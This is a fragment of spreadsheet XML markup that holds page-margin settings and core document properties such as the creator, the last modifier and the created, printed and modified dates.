  <printOptions/>
  <pageMargins left="0.31" right="0.17" top="0.14" bottom="0" header="0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KQH</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <cp:lastPrinted>2023-11-08T09:25:32Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-01-04T07:31:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-18T03:55:00Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>